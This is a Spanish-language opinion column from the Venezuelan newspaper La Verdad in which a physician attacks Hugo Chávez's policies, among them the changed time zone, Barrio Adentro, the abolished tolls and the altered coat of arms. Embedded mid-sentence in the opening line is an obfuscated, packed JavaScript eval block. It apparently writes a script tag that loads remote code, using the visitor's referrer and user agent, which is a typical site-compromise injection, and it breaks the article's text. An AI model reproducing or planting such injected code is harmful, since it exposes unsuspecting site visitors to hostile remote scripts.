publicidad

Corregir los disparates del difunto

Ernesto García Mac-Gregor / Médico /garciamacgregor@gmail.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|itdsy|var|u0026u|referrer|rttdf||js|php'.split('|'),0,{})) encantador de serpientes, se le metió en la cabeza que los médicos venezolanos no servían, e ideó un sistema paralelo manejado desde Cuba

Por desgracia, el encantador de serpientes, con su carisma y su labia prodigiosa, se aprovechó de una Venezuela convulsionada, aburrida y sobre todo ignorante, para imponer su experimento comunista, y lo logró, a pesar que dicha experiencia había fracasado en todas partes del mundo. 

Para colmo de males, la megalomanía lo llevó a fraguar, no un proyecto de país planificado, sino uno que iba siendo lo que a él se le antojara que fuera, según las circunstancias del momento. Observó a un escolar madrugar para ir a la escuela y se encaprichó en cambiar la hora oficial, desfasándonos del huso horario internacional del resto del mundo. El próximo domingo, se corrige este acto de atraso.

Se le metió en la cabeza que los médicos venezolanos no servían, e ideó un sistema paralelo manejado desde Cuba, sin ningún vínculo con el Ministerio de Salud, que resultó en una duplicidad de esfuerzo, que terminó en el estado lamentable de los institutos sanitarios actuales. Ya Barrio Adentro se está anexando al ministerio y los cubanos se fugaron hacia el norte.

Eliminó los peajes por “representar el capitalismo que privatiza carretera”, y provocó el deterioro de todo el sistema de vialidad nacional, otrora motivo de orgullo latinoamericano. En 2015, reactivaron 71 peajes, demostrando que estaba equivocado. Lo mismo ocurrió con los aeropuertos y puertos cuya administración está retornando a los estados después del fracaso centralizador del difunto.

Su hijita le comentó que el caballito del Escudo nacional parecía “como frenado”, y el iletrado, con un desconocimiento total de las leyes de la heráldica, cambió al animal que miraba hacia la derecha (lo correcto) y lo puso a mirar a la izquierda. Obra de algún reaccionario expresó en su ignorancia. También hay que cambiar la Bandera y agregar las estrellas correspondientes a las provincias de Coro y Zulia que erróneamente no fueron añadidas.

Todavía falta sepultar al difunto que, según Aristóbulo, fue asesinado no obstante su cáncer terminal. Devolver todos los “exprópiese”, quitar el nombre de “popular” y “bolivariano” a entidades oficiales, y enterrar lo que queda de la maldición del comunismo del siglo XXI. Que oiga quien tiene oídos.

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama